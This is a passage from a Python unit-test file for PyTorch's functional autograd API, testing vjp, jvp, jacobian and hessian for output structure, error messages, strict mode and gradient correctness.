self.assertEqual(el_base.size(), el_res.size())
else:
# Wrong base
raise RuntimeError("The base given to `_assert_same_struct` doesn't have"
" the right structure.")
def _assert_interleaved_struct(self, res, base1, base2):
# base1 and base2 can be Tensors or tuples of Tensors.
# If they are tuples, res should be a tuple as well.
# The indexing works as follows for base1, base2 being
# - tuple, tuple: res[i][j][k][l] = (base1[i][k], base2[j][l])
# - tuple, Tensor: res[i][k][l] = (base1[i][k], base2[l])
# - Tensor, tuple: res[i][j][l] = (base1[i], base2[j][l])
# - Tensor, Tensor: res[k][l] = (base1[k], base2[l])
if isinstance(base1, torch.Tensor) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(res.size(), base1.size() + base2.size())
elif isinstance(base1, tuple) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base1, torch.Tensor))
self.assertEqual(el_res.size(), el_base1.size() + base2.size())
elif isinstance(base1, torch.Tensor) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base2))
for el_res, el_base2 in zip(res, base2):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_res.size(), base1.size() + el_base2.size())
elif isinstance(base1, tuple) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, tuple))
self.assertEqual(len(res), len(base2))
for el_el_res, el_base2 in zip(el_res, base2):
self.assertTrue(isinstance(el_el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_el_res.size(), el_base1.size() + el_base2.size())
else:
# Wrong bases
raise RuntimeError("The bases given to `_assert_interleaved_struct` don't have"
" the right structure.")
def test_vjp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.ones(3)
with self.assertRaisesRegex(TypeError, "The inputs given to vjp must be either a Tensor"):
res = autogradF.vjp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vjp must"):
res = autogradF.vjp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the user-provided function returns"):
res = autogradF.vjp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.vjp(foo, inp, (torch.ones_like(inp), torch.ones_like(inp)))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.vjp(foo, inp, v[:2])
res = autogradF.vjp(foo, inp, v)[1]
self._assert_same_struct(res, inp)
def test_vjp_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.vjp(foo, inp, v, strict=True)
res = autogradF.vjp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.vjp(bar, inp, v, strict=True)
res = autogradF.vjp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.vjp(foo, inp, v, create_graph=True, strict=True)
res = autogradF.vjp(foo, inp, v, create_graph=True, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1], v)
def test_vjp_no_grad(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vjp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = torch.ones(2)
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def test_vjp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones([])
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vjp(reducer, inputs)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones(4)
res = autogradF.vjp(expander, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def test_vjp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vjp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_jvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jvp must be either a Tensor"):
res = autogradF.jvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jvp must"):
res = autogradF.jvp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the input to the user-provided function"):
res = autogradF.jvp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.jvp(foo, inp, (v, v))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.jvp(foo, inp, v[:2])
res = autogradF.jvp(foo, inp, v)[1]
self._assert_same_struct(res, foo(inp))
def test_jvp_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jvp(foo, inp, v, strict=True)
res = autogradF.jvp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], res[0])
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.jvp(bar, inp, v, strict=True)
res = autogradF.jvp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], res[0])
self.assertEqual(res[1].abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jvp(foo, inp, v, create_graph=True, strict=True)
res = autogradF.jvp(foo, inp, v, create_graph=True, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1], v)
def test_jvp_no_grad(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_jvp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[1], res[0])
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.ones(2), torch.ones(2))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out.grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def test_jvp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[0], torch.zeros([]))
self._assert_same_struct(res[1], res[0])
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones([])
res = autogradF.jvp(expander, inputs, v)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
res = autogradF.jvp(expander, inputs)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
def test_jvp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, 2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], res[0])
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.jvp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def _test_construct_standard_basis_for(self, inputs):
numels = tuple(tensor.numel() for tensor in inputs)
results = autogradF._construct_standard_basis_for(inputs, numels)
for result, inp in zip(results, inputs):
self.assertEqual(result.dtype, inp.dtype)
self.assertEqual(result.device, inp.device)
results = torch.cat([result.to(device='cpu', dtype=torch.float)
for result in results], dim=1)
expected = torch.eye(results[0].shape[0], dtype=torch.float)
self.assertEqual(results, expected)
def test_construct_standard_basis_for(self):
test_cases = [
(torch.randn(2, 3),),
(torch.randn(1),),
(torch.randn([]),),
(torch.randn(1), torch.randn([]), torch.randn([])),
(torch.randn(2), torch.randn(3), torch.randn([])),
(torch.randn(2), torch.randn([]), torch.randn(3)),
(torch.randn(2, 3), torch.randn(3), torch.randn(3, 4, 2)),
(torch.randn(2, dtype=torch.float64), torch.randn(3, dtype=torch.float32)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_construct_standard_basis_for_cuda(self):
test_cases = [
(torch.randn(2), torch.randn(3, device='cuda')),
(torch.randn(3, device='cuda'), torch.randn(2)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
def _test_vectorize_raises_no_warnings(self, api):
# vmap is an experimental prototype. When someone calls torch.vmap,
# it raises a python warning. This test checks that
# autogradF.{jacobian, hessian} don't raise that experimental prototype
# warning; it is not nice for a public-facing API to raise a warning
# no matter how it is called.
def foo(a):
return (a ** 2).sum()
x = torch.randn(3)
with warnings.catch_warnings(record=True) as wa:
result = api(foo, x, vectorize=True)
self.assertEqual(len(wa), 0)
def test_jacobian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.jacobian)
def test_hessian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.hessian)
def _test_jacobian_err_check(self, vectorize):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jacobian must be either a Tensor"):
res = autogradF.jacobian(foo, (inp, 2), vectorize=vectorize)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jacobian must"):
res = autogradF.jacobian(bar, inp, vectorize=vectorize)
res = autogradF.jacobian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, foo(inp), inp)
def foo(a, b):
return b, 3 * a.narrow(0, 0, 3)
inp = (torch.rand(4), torch.rand(5))
res = autogradF.jacobian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, foo(*inp), inp)
def test_jacobian_err_check(self):
return self._test_jacobian_err_check(vectorize=False)
def test_jacobian_err_check_vectorize(self):
return self._test_jacobian_err_check(vectorize=True)
def test_jacobian_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jacobian(foo, inp, strict=True)
res = autogradF.jacobian(foo, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function is independent of input 0."):
res = autogradF.jacobian(bar, inp, strict=True)
res = autogradF.jacobian(bar, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jacobian(foo, inp, create_graph=True, strict=True)
res = autogradF.jacobian(foo, inp, create_graph=True, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res, torch.eye(4))
def test_jacobian_err_check_strict_vectorize(self):
def foo(x):
return x
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.jacobian(foo, inp, strict=True, vectorize=True)
def test_jacobian_no_grad(self):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4)
with torch.no_grad():
res = autogradF.jacobian(exp_reducer, inputs)
self.assertIsNone(res.grad_fn)
self.assertNotEqual(res, torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.jacobian(exp_reducer, inputs, create_graph=True)
self.assertIsNotNone(res.grad_fn)
self.assertNotEqual(res, torch.zeros(4, 4))
def _test_jacobian_output(self, vectorize):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4)
res = autogradF.jacobian(exp_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
self.assertIsNone(res.grad_fn)
def identity(x):
return x.clone()
inputs = torch.rand(4)
res = autogradF.jacobian(identity, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, identity(inputs), inputs)
self.assertIsNone(res.grad_fn)
self.assertEqual(res, torch.eye(4))
def add_exp_reducer(x, y):
return (x + y.exp()).sum(dim=1)
inputs = (torch.rand(4, 4), torch.rand(4, 4))
res = autogradF.jacobian(add_exp_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def test_jacobian_output(self):
self._test_jacobian_output(vectorize=False)
def test_jacobian_output_vectorize(self):
self._test_jacobian_output(vectorize=True)
def _test_jacobian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.jacobian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
res = autogradF.jacobian(expander, inputs, vectorize=vectorize)
self._assert_same_struct(res, torch.zeros(4))
def test_jacobian_scalar(self):
self._test_jacobian_scalar(vectorize=False)
def test_jacobian_scalar_vectorize(self):
self._test_jacobian_scalar(vectorize=True)
def _test_jacobian_create_graph(self, vectorize):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.jacobian(exp_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
self.assertIsNotNone(res.grad_fn)
gradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def add_exp_reducer(x, y):
return (x + y).exp().sum(dim=1)
inputs = (torch.rand(4, 4, dtype=torch.double, requires_grad=True),
torch.rand(4, 4, dtype=torch.double, requires_grad=True))
res = autogradF.jacobian(add_exp_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def foo(x, y):
x = x.cos()
val, jac = autogradF.jacobian(add_exp_reducer, (x, y), create_graph=True, vectorize=vectorize)
res = val[0].exp().sum() + val[1].exp().sum() + jac[0].exp().sum()
res = res + jac[1].exp().sum() + x.exp().sum() + y.exp().sum()
return res
gradcheck(foo, inputs)
gradgradcheck(foo, inputs)
def test_jacobian_create_graph(self):
self._test_jacobian_create_graph(vectorize=False)
def test_jacobian_create_graph_vectorize(self):
self._test_jacobian_create_graph(vectorize=True)
def _check_jacobian_vectorize_correctness(self, f, inputs):
expected = autogradF.jacobian(f, inputs, vectorize=False)
result = autogradF.jacobian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
def test_jacobian_vectorize_correctness_simple(self):
def f(x):
return 3 * x ** 2
x = torch.randn(2, 3, 5)
self._check_jacobian_vectorize_correctness(f, x)
def test_jacobian_vectorize_correctness_multi_input(self):
def f(x, y):
return (x.cos() * x) @ y.sin()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_multi_input_multi_output(self):
def f(x, y):
return (x * x) @ y, x @ (x.sum(1) * y), y.sum()
x = torch.randn(5, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_unrelated_outputs(self):
def f(x, y):
return x, y, x, y
x = torch.randn(2)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_zero_dim(self):
# zero-dim output
def f(x, y):
return x.sum(), y.sum(), x * y
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
# zero-dim input
def g(x):
return torch.stack([x, x, x])
x = torch.randn([])
self._check_jacobian_vectorize_correctness(g, x)
# Mixed zero-dim input / zero-dim output
def h(x, y):
return y.sum(), x * y
x = torch.randn([])
y = torch.randn(1)
self._check_jacobian_vectorize_correctness(h, (x, y))
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_jacobian_vectorize_correctness_different_devices(self):
def f(x, y):
return x * y, (x * y).cuda()
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_different_dtype(self):
def f(x, y):
return (x * y).float(), (x * y).double()
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def _check_hessian_vectorize_correctness(self, f, inputs):
expected = autogradF.hessian(f, inputs, vectorize=False)
result = autogradF.hessian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
def test_hessian_vectorize_correctness_simple(self):
def f(x):
return (3 * x ** 2).sum()
x = torch.randn(2, 3, 5)
self._check_hessian_vectorize_correctness(f, x)
def test_hessian_vectorize_correctness_multi_input(self):
def f(x, y, z):
return ((x.relu() * x) @ y.sin() @ z).sum()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
z = torch.randn(5, 5)
self._check_hessian_vectorize_correctness(f, (x, y, z))
def test_hessian_vectorize_correctness_unrelated_outputs(self):
# output unrelated to one input
def f(x, y):
return (x ** 2).sum()
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
# output unrelated to all inputs
def f(x, y):
return torch.randn([])
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
def _test_hessian_err_check(self, vectorize):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
def bar3(a):
return 3 * a.narrow(0, 0, 3), 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to hessian must be either a Tensor"):
res = autogradF.hessian(foo, (inp, 2), vectorize=vectorize)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hessian must"):
res = autogradF.hessian(bar, inp, vectorize=vectorize)
err_msg_out = "The Tensor returned by the function given to hessian should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hessian(bar2, inp, vectorize=vectorize)
with self.assertRaisesRegex(RuntimeError, "The function given to hessian should return a single Tensor"):
res = autogradF.hessian(bar3, inp, vectorize=vectorize)
res = autogradF.hessian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, inp, inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
res = autogradF.hessian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, inp, inp)
def test_hessian_err_check(self):
self._test_hessian_err_check(vectorize=False)
def test_hessian_err_check_vectorize(self):
self._test_hessian_err_check(vectorize=True)
def test_hessian_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A Linear function for which the jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.hessian(foo, inp, strict=True)
res = autogradF.hessian(foo, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0"):
res = autogradF.hessian(bar, inp, strict=True)
res = autogradF.hessian(bar, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.hessian(bar2, inp, strict=True)
res = autogradF.hessian(bar2, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
def test_hessian_err_check_strict_vectorize(self):
def foo(x):
return (x ** 3).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.hessian(foo, inp, strict=True, vectorize=True)
def test_hessian_no_grad(self):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs, create_graph=True)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
def _test_hessian_output(self, vectorize):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
res = autogradF.hessian(pow_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNone(res.grad_fn)
def add_pow_reducer(x, y):
return (x + y).pow(3).sum()
inputs = (torch.rand(2, 2), torch.rand(2, 2))
res = autogradF.hessian(add_pow_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
def test_hessian_output(self):
self._test_hessian_output(vectorize=False)
def test_hessian_output_vectorize(self):
self._test_hessian_output(vectorize=True)
def _test_hessian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
inputs = torch.rand([])
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
res = autogradF.hessian(bad_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
def test_hessian_scalar(self):
return self._test_hessian_scalar(vectorize=False)
def test_hessian_scalar_vectorize(self):
return self._test_hessian_scalar(vectorize=True)
def _test_hessian_create_graph(self, vectorize):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
res = autogradF.hessian(pow_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNotNone(res.grad_fn)
gradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def add_pow_reducer(x, y):
return (x + y).pow(3).sum()
inputs = (torch.rand(2, 2, dtype=torch.double, requires_grad=True),
torch.rand(2, 2, dtype=torch.double, requires_grad=True))
res = autogradF.hessian(add_pow_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
def flatten(inp):
